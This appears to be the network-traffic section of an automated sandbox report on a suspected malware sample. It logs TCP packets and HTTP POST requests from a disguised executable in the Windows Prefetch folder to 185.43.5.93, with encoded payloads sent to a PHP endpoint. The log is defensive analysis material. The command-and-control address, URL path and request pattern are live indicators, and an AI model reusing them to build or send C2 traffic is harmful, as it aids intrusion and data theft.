                                                            Dec 10, 2024 07:33:28.511159897 CET8049912185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.216737032 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.360665083 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.364178896 CET8049912185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.451431036 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.470024109 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.603425026 CET8049912185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.673132896 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.673322916 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.775515079 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.775566101 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.776088953 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.895090103 CET8049910185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.895144939 CET4991080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.895296097 CET8049918185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.895642996 CET8049912185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:29.895709991 CET4991280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.898051977 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:29.906306982 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:30.025569916 CET8049918185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:30.251306057 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:30.370570898 CET8049918185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:31.225570917 CET8049918185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:31.313719988 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:31.459662914 CET8049918185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:31.623245001 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:31.626198053 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:31.729070902 CET4991880192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:31.742501020 CET8049924185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:31.744328022 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:31.744492054 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:31.863682985 CET8049924185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:32.095103979 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:32.214384079 CET8049924185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:33.074024916 CET8049924185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:33.120891094 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:33.303427935 CET8049924185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:33.436587095 CET4992980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:33.436595917 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:33.555955887 CET8049929185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:33.556168079 CET8049924185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:33.556252003 CET4992480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:33.556277037 CET4992980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:33.556442022 CET4992980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:33.675633907 CET8049929185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:33.907604933 CET4992980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.028611898 CET8049929185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:34.470880985 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.471113920 CET4992980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.590259075 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:34.590346098 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.590481997 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.590799093 CET8049929185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:34.590990067 CET4992980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.658123970 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.858604908 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:34.938826084 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.964255095 CET8049932185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:34.964677095 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:34.964966059 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:35.058396101 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:35.058413029 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:35.084580898 CET8049932185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:35.313838959 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:35.433301926 CET8049932185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:35.930350065 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:35.985589027 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.163763046 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:36.204319954 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.321985006 CET8049932185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:36.376198053 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.555479050 CET8049932185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:36.610559940 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.688905954 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.688983917 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.689321041 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.808614016 CET8049931185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:36.808659077 CET8049937185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:36.808795929 CET4993180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.808864117 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.809101105 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.809101105 CET8049932185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:36.809185982 CET4993280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:36.928400040 CET8049937185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:37.157524109 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:37.276906013 CET8049937185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.028677940 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.028799057 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.135507107 CET8049937185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.138276100 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.148130894 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.148287058 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.148420095 CET8049937185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.148473978 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.148504972 CET4993780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.174485922 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.267867088 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.293912888 CET8049942185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.296291113 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.296608925 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.415800095 CET8049942185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.501379013 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.620918036 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.620934010 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.620944977 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.620966911 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.621037960 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.621059895 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.621073961 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.621123075 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.621236086 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.621246099 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.621301889 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.642000914 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:38.740451097 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.740539074 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.740550995 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:38.761439085 CET8049942185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:39.487857103 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:39.532527924 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:39.626898050 CET8049942185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:39.673094988 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:39.723537922 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:39.766833067 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:39.859477043 CET8049942185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:39.907510996 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:39.982323885 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:39.982625008 CET4994780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:39.982626915 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:40.103126049 CET8049947185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:40.103140116 CET8049941185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:40.103293896 CET4994780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:40.103296041 CET4994180192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:40.103375912 CET8049942185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:40.103439093 CET4994280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:40.103610039 CET4994780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:40.223330975 CET8049947185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:40.454638004 CET4994780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:40.573937893 CET8049947185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.173858881 CET4994780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.173949003 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.293235064 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.293365955 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.293481112 CET8049947185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.293484926 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.293565035 CET4994780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.295742035 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.412715912 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.415035009 CET8049950185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.415153027 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.415687084 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.535024881 CET8049950185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.641968966 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.761354923 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.762109995 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:41.766963959 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:41.886468887 CET8049950185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:42.633164883 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:42.688735962 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:42.744828939 CET8049950185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:42.798109055 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:42.867526054 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:42.923120022 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:42.979509115 CET8049950185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:43.032447100 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.107924938 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.107927084 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.108280897 CET4995580192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.227546930 CET8049955185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:43.227627993 CET4995580192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.227639914 CET8049949185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:43.227688074 CET4994980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.227819920 CET4995580192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.228185892 CET8049950185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:43.228226900 CET4995080192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.347191095 CET8049955185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:43.579487085 CET4995580192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:43.698915005 CET8049955185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:44.566890001 CET8049955185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:44.610601902 CET4995580192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:44.799963951 CET8049955185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:44.845011950 CET4995580192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:44.923038006 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:45.046745062 CET8049959185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:45.046883106 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:45.047045946 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:45.167114019 CET8049959185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:45.391974926 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:45.511327982 CET8049959185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:46.394697905 CET8049959185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:46.438726902 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:46.642616987 CET8049959185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:46.688666105 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:46.769882917 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:46.770232916 CET4996480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:46.890387058 CET8049964185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:46.890512943 CET4996480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:46.890518904 CET8049959185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:46.890573978 CET4995980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:46.890717983 CET4996480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.009913921 CET8049964185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:47.235654116 CET4996480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.355076075 CET8049964185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:47.877444029 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.877722025 CET4996480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.997693062 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:47.997821093 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.997967958 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.998050928 CET8049964185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:47.998123884 CET4996480192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:47.998347044 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:48.117209911 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:48.117650032 CET8049969185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:48.117747068 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:48.117922068 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:48.237149954 CET8049969185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:48.345115900 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:48.464509964 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:48.464524984 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:48.470046043 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:48.589427948 CET8049969185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.337601900 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.391813993 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.456485033 CET8049969185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.501773119 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.571682930 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.629014969 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.691329956 CET8049969185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.735551119 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.811939001 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.812011957 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.812743902 CET4997280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.931655884 CET8049967185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.931804895 CET4996780192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.931920052 CET8049972185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.931996107 CET4997280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.932112932 CET8049969185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:49.932164907 CET4996980192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:49.932235956 CET4997280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:50.051654100 CET8049972185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:50.282543898 CET4997280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:50.401922941 CET8049972185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:51.259231091 CET8049972185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:51.313663006 CET4997280192.168.2.5185.43.5.93
                                                            Dec 10, 2024 07:33:51.491430998 CET8049972185.43.5.93192.168.2.5
                                                            Dec 10, 2024 07:33:51.532399893 CET4997280192.168.2.5185.43.5.93
                                                            • 185.43.5.93
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549867185.43.5.93806180C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 10, 2024 07:33:12.846340895 CET302OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 10, 2024 07:33:13.205267906 CET344OUTData Raw: 05 06 01 00 06 0d 01 02 05 06 02 01 02 07 01 03 00 01 05 0a 02 04 03 0e 07 04 0d 0c 03 0e 01 06 0d 01 04 5d 02 50 05 52 0b 0b 07 06 07 01 04 04 03 03 0f 00 0d 03 07 06 06 54 06 04 07 0a 05 58 05 07 0f 0d 00 04 07 51 0f 01 0f 02 0f 50 0f 04 07 53
                                                            Data Ascii: ]PRTXQPSRR\L~hY~Mc\maKsTRWwR^~`lIxo{Jxc~DhmZAwwliO~V@Ax}~O}ri
                                                            Dec 10, 2024 07:33:14.185507059 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:14.290899992 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 35 37 34 0d 0a 56 4a 7d 5d 78 6d 67 07 78 4c 60 48 6b 72 7b 01 6a 01 73 4f 7e 70 72 54 7a 5d 68 4f 7e 72 60 49 60 60 75 0c 7b 62 62 5f 76 76 6b 5f 6a 4b 78 01 55 4b 72 50 60 4c 73 07 68 72 6a 58 7c 67 5b 52 78 48 73 52 7d 4d 5e 58 76 62 7d 04 60 4f 69 04 7f 61 7a 49 6a 52 73 50 7d 59 77 03 76 66 7b 06 7c 5b 6d 05 7e 73 6d 00 78 67 6f 5c 78 74 74 4f 78 53 55 49 79 5c 7b 5a 6f 63 6e 4c 6b 60 6c 44 6c 67 77 59 6a 61 7b 4e 75 58 60 48 7a 51 41 5b 7c 59 77 51 7c 62 7d 0a 75 52 74 07 6f 52 6b 58 74 60 61 52 79 62 65 02 7c 6c 75 5a 78 4f 66 48 76 4d 6f 49 76 72 64 06 60 61 66 50 7e 5d 79 5f 60 5b 7d 04 76 65 5e 09 7f 6c 66 5c 77 6f 7c 04 7e 70 7c 01 6f 6c 64 5a 7b 4e 66 01 6b 6d 68 08 74 64 7c 04 69 61 7e 09 7e 54 73 0c 6c 6e 62 41 7d 71 76 5a 7b 5d 46 51 7f 52 6c 08 6a 60 63 51 7d 77 79 5d 7b 0b 6b 4a 6c 62 56 00 68 5f 7b 44 6a 59 7b 08 7c 06 61 0a 79 73 7f 58 7d 62 6f 5b 74 63 79 51 7b 5c 79 06 75 48 56 03 7c 66 78 4d 7e 58 6d 0d 74 62 63 07 7d 62 5b 4c 7f 59 72 08 78 76 68 08 7e 4d 77 49 75 72 69 03 77 [TRUNCATED]
                                                            Data Ascii: 574VJ}]xmgxL`Hkr{jsO~prTz]hO~r`I``u{bb_vvk_jKxUKrP`LshrjX|g[RxHsR}M^Xvb}`OiazIjRsP}Ywvf{|[m~smxgo\xttOxSUIy\{ZocnLk`lDlgwYja{NuX`HzQA[|YwQ|b}uRtoRkXt`aRybe|luZxOfHvMoIvrd`afP~]y_`[}ve^lf\wo|~p|oldZ{Nfkmhtd|ia~~TslnbA}qvZ{]FQRlj`cQ}wy]{kJlbVh_{DjY{|aysX}bo[tcyQ{\yuHV|fxM~Xmtbc}b[LYrxvh~MwIuriwaaJ~qj~ld~wIu_YI{r_}^}xIR{I`xScy\lzsPA``{w`K}rQOwqlJ~|UwZBaSvl`A{lxt^vzau}lzxaXvM{uaxNwOn@Nfvr[Lve^latRp~shJyl{{N~|mttYl~LfB~msxCrL}rSM}`dOBhph~Yb{CUDxrhFqw~wwA|N[{sZ}rpwsuA{a[DufVE}XhM}fywLUKb[O|gbC{H^O~s{Hu\SOwaa~qr|x~gwDua{{\i~pmDygxM{YhL{SwyLpxMr{]NZlYRIib{bb`}RswthqSvBlxltK`^bz_zZ~Rv_z\y\}b`g{ZL~Jx^}_vqbXaetUaMcU|O|]loB{xcvC^twQ]jqbzSYQcT[]jafS|sBhowSYgQRdSGWtXc~{GUrdYWvNHSZfP`ET[cHZvK}\GZaxjfg[vjTwacJ}rSMhYTClf{P}Zwwqmc_j]kavXVFPjdE[rJoTEkr_UkoXUh\yP{{\dy]rOMJ{YRZu|YbbGQp`\Sd^kX]kp|S]]MucV~BzQD_oeG[pNbYCa}Uk_A[_qqZTUAro[sGx^NZl`DVsKhULasZj[NQRxNo~b [TRUNCATED]
                                                            Dec 10, 2024 07:33:14.291258097 CET358INData Raw: 5e 5f 51 60 5a 6f 06 79 70 59 47 5a 5a 43 51 78 76 7a 5d 62 65 08 45 51 7a 67 59 51 65 0d 5e 60 04 0b 02 50 58 62 4c 57 66 7d 4f 6c 75 6c 51 7c 5e 78 66 6d 4f 71 45 70 58 5c 5c 53 06 71 42 54 6f 51 49 52 5f 0b 59 5a 06 64 45 51 7e 72 05 67 59 7e
                                                            Data Ascii: ^_Q`ZoypYGZZCQxvz]beEQzgYQe^`PXbLWf}OlulQ|^xfmOqEpX\\SqBToQIR_YZdEQ~rgY~Gl`p_o@Wa`]muweQpqhltZzp]ia@Z}c^RoTkMVrXLbodZcg~}^rzQD_oeG[pNbYCayOSZaG[[n@\tPSoe\vQszSsW{tpWceJSnwQpZN_jaNP~No[ChH_Vs]VokUy^^Q}wvA{CgD
                                                            Dec 10, 2024 07:33:14.324624062 CET278OUTPOST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                            Host: 185.43.5.93
                                                            Content-Length: 384
                                                            Expect: 100-continue
                                                            Dec 10, 2024 07:33:14.673285007 CET384OUTData Raw: 5a 52 5c 5c 5d 5d 53 5b 58 5f 51 55 5a 57 58 5d 56 52 58 5e 56 5d 50 5a 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59
                                                            Data Ascii: ZR\\]]S[X_QUZWX]VRX^V]PZPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\-"0!Q #)];"3(+?!U#,3?%Q>;3$[&(!^" \)
                                                            Dec 10, 2024 07:33:14.765646935 CET25INHTTP/1.1 100 Continue
                                                            Dec 10, 2024 07:33:15.131705046 CET349INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 10 Dec 2024 06:33:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
